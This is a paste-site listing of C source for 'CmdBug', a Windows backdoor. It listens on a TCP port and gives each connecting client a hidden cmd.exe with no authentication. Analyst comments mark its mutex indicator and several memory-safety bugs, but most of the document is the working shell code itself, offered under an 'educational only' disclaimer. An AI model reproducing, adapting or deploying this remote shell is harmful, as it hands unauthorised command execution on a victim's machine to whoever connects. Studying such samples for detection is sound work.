FlyFar

CmdBug - Remote Shell - Source Code

Mar 23rd, 2023
C 3.96 KB | Cybersecurity | 0 0
  1. /*****************************************************\
  2. |******************* CmdBug v1.0 *********************|
  3. |****************** Coded By Ecks ********************|
  4. |*****************************************************|
  5. | This program is for educational uses only. It is not|
  6. | intended to be compiled, tested, run, or distributed|
  7. | in any way. If you break these terms you take full  |
  8. | responsibility for anything your actions may cause. |
  9. \*****************************************************/
  10.  
  11. #include <windows.h>
  12. #include <winsock2.h>
  13.  
  14. DWORD WINAPI HandleScks(LPVOID lpParam);
  15.  
/*
 * Program entry point: enforces a single running instance, opens a TCP
 * listener on 127.0.0.1:103 and hands every accepted connection to a new
 * HandleScks thread.
 *
 * Analyst notes (all taken from the code below):
 *  - The mutex name "[~C~m~d~B~u~g~]" is a fixed string, so it is a stable
 *    host-based indicator for this sample.
 *  - The listener is bound to the loopback address only; as written it is
 *    reachable from the local machine, not from the network.
 *  - No WinMain parameter is read.
 *
 * Always returns 0.
 */
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nCmdShow)
{
    /* Single-instance guard: a second copy sees ERROR_ALREADY_EXISTS and exits.
       The mutex handle is discarded, so it is never released or closed here. */
    CreateMutex(NULL, TRUE, "[~C~m~d~B~u~g~]");
    if(GetLastError() == ERROR_ALREADY_EXISTS) return 0;

    /* Request Winsock 2.2; on failure exit without touching any socket. */
    WSADATA wsaDat;
    if(WSAStartup(MAKEWORD(2, 2), &wsaDat) != NO_ERROR) return 0;

    SOCKET listenSck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(listenSck == INVALID_SOCKET) goto cleanup;

    /* Loopback address, TCP port 103. Only the three fields below are set;
       the rest of `service` is left uninitialised. */
    sockaddr_in service;
    service.sin_family = AF_INET;
    service.sin_addr.s_addr = inet_addr("127.0.0.1");
    service.sin_port = htons(103);
    if(bind(listenSck, (sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) goto cleanup;

    /* Backlog of 1 pending connection. */
    if(listen(listenSck, 1) == SOCKET_ERROR) goto cleanup;

    /* Accept loop with no exit condition: each connection gets its own thread,
       with the socket value passed through the LPVOID thread parameter.
       The thread handle returned by CreateThread is discarded (never closed). */
    SOCKET acceptSck;
    while(1) {
        acceptSck = accept(listenSck, NULL, NULL);
        if(acceptSck != INVALID_SOCKET)
            CreateThread(NULL, 0, HandleScks, (LPVOID)acceptSck, 0, NULL);
    }

    /* Reached only through the gotos above, because the loop never breaks.
       NOTE(review): on every one of those paths acceptSck has not been
       assigned yet, so closesocket(acceptSck) receives an indeterminate
       value; on the first goto listenSck is INVALID_SOCKET as well. */
    cleanup:
        closesocket(acceptSck);
        closesocket(listenSck);
        WSACleanup();
    return 0;
}
  48.  
/*
 * Per-connection thread: starts a hidden cmd.exe whose standard handles are
 * anonymous pipes and relays data between those pipes and the socket.
 *
 * lpParam  the accepted SOCKET, cast to LPVOID by the caller.
 * Returns  0 in every case.
 *
 * Analyst notes (all taken from the code below):
 *  - Nothing in this function authenticates the peer: whatever connects to
 *    the listener is given the shell, running in this process's security
 *    context.
 *  - Observable behaviour: a cmd.exe child with SW_HIDE and redirected
 *    stdin/stdout/stderr, parented by the process that owns the listener.
 *  - The function has several memory-safety defects, flagged inline with
 *    NOTE(review); the sample is unstable as written.
 */
DWORD WINAPI HandleScks(LPVOID lpParam)
{
    SOCKET theSck = (SOCKET)lpParam;
    HANDLE stdinRd, stdinWr, stdoutRd, stdoutWr;
    /* Third member (bInheritHandle) is true: both pipes are created inheritable
       so the child process can use them. */
    SECURITY_ATTRIBUTES sa = {sizeof(SECURITY_ATTRIBUTES), NULL, true};
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    DWORD stuff;    /* scratch: exit code, bytes available, bytes read/written */
    char buff[1000], recvBuff[5];
    bool firstsend;
    int offset = 0, bRecv;

    /* Banner. NOTE(review): every `goto closeSck` before CreateProcess succeeds
       reaches the cleanup code with `pi` unset, and this first one also with
       all four pipe handles unset. */
    if(send(theSck, "Welcome To The CmdBug Server v1.0\r\nStarting The Remote Shell...\r\n\r\n\r\n", 69, 0) == SOCKET_ERROR) goto closeSck;

    /* One pipe for the child's stdin, one shared by its stdout and stderr.
       If the second CreatePipe fails, the first pair is already open. */
    if(!CreatePipe(&stdinRd, &stdinWr, &sa, 0) || !CreatePipe(&stdoutRd, &stdoutWr, &sa, 0)) {
        send(theSck, "Error Creating Pipes For Remote Shell. Closing Connection...", 60, 0);
        goto closeSck;
    }

    /* Start from this process's own startup info, then override the standard
       handles and hide the window. */
    GetStartupInfo(&si);
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = stdoutWr;
    si.hStdError = stdoutWr;
    si.hStdInput = stdinRd;
    /* Hard-coded interpreter path; bInheritHandles is TRUE so the child
       receives the pipe ends. */
    if(!CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        send(theSck, "Error Spawning Command Prompt. Closing Connection...", 52, 0);
        goto closeSck;
    }

    /* Relay loop: runs until the child exits or the peer disconnects. */
    while(1) {
        Sleep(100);
        GetExitCodeProcess(pi.hProcess, &stuff);
        if(stuff != STILL_ACTIVE) break;

        /* Ask how many bytes are waiting on the child's output pipe
           without consuming them. */
        PeekNamedPipe(stdoutRd, NULL, 0, NULL, &stuff, NULL);
        if(stuff != 0) {
            ZeroMemory(buff, sizeof(buff));
            firstsend = true;
            do {
                /* NOTE(review): a full 1000-byte read leaves no NUL inside
                   buff, so the strlen() calls below read past the array.
                   buff is zeroed only once, before the loop, so a shorter
                   later read leaves bytes from the previous read behind it. */
                ReadFile(stdoutRd, buff, 1000, &stuff, NULL);
                /* First chunk is sent starting at `offset` -- presumably to skip
                   the echo of the input written earlier; confirm.
                   NOTE(review): if offset exceeds strlen(buff) the pointer is
                   past the data and the unsigned subtraction wraps. */
                if(firstsend) { send(theSck, buff + offset, strlen(buff) - offset, 0); firstsend = false; }
                else send(theSck, buff, strlen(buff), 0);
            } while(stuff == 1000);   /* a full buffer is taken to mean more data is pending */
        }

        /* NOTE(review): on the first pass recvBuff has never been written, so
           this strcmp reads uninitialised memory. */
        if(!strcmp(recvBuff, "\r\n")) offset = 0;
        /* NOTE(review): recvBuff holds 5 bytes but up to 1000 are accepted, and
           the terminator below is written at index bRecv -- input of 5 bytes or
           more writes past the array (stack buffer overflow).
           The socket is never switched to non-blocking in this listing, so this
           call waits for input before any further output is relayed. */
        bRecv = recv(theSck, recvBuff, 1000, 0);
        if( (bRecv == 0) || (bRecv == SOCKET_ERROR) ) break;
        recvBuff[bRecv] = '\0';
        /* Forward the received text to the child's stdin; an embedded NUL
           shortens what is forwarded because the length comes from strlen. */
        WriteFile(stdinWr, recvBuff, strlen(recvBuff), &stuff, NULL);
        offset = offset + bRecv;
    }

    /* Shared cleanup: ends the child process and closes the pipes and socket.
       pi.hProcess and pi.hThread are never passed to CloseHandle. */
    closeSck:
        TerminateProcess(pi.hProcess, 0);
        CloseHandle(stdinRd);
        CloseHandle(stdinWr);
        CloseHandle(stdoutRd);
        CloseHandle(stdoutWr);
        closesocket(theSck);
    return 0;
}
  112.  